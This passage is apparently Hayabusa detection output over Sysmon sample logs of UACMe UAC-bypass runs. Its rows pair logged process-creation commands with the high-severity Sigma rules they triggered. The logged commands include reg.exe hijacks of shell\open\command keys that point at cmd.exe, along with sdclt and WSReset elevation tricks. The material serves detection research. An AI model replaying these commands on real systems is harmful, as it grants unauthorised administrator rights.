+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 
36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k 
netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: 
NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry 
Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via 